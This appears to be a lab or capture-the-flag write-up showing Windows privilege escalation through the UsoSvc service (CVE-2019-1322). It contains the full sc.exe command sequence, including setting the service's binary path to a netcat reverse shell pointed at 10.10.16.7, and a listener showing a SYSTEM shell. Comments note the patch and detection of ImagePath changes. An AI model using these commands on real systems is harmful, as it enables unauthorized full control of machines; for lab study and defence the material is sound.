8 privesc_2 UsoSvc
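# PEAS shows the current user has full access to the UsoSvc service, so its configuration (including the binary path) can be changed.
# UsoSvc runs as LocalSystem (SERVICE_START_NAME in the qc output below), so whatever its binary path points to runs as SYSTEM the next time the service starts.
# The reference linked below lists this under CVE-2019-1322. The fix is to apply the vendor patch and tighten service permissions so low-privileged accounts cannot reconfigure services.
# For detection, watch for changes to a service's binary path (the ImagePath value under the service's registry key), especially when the new path points at a user-writable directory.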
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc
C:\inetpub\new-site>sc stop UsoSvc
sc stop UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x6
WAIT_HINT : 0x7530
C:\inetpub\new-site>sc query UsoSvc
sc query UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\inetpub\new-site>sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\new-site>sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
C:\inetpub\new-site>sc start UsoSvc
$ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 53623
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system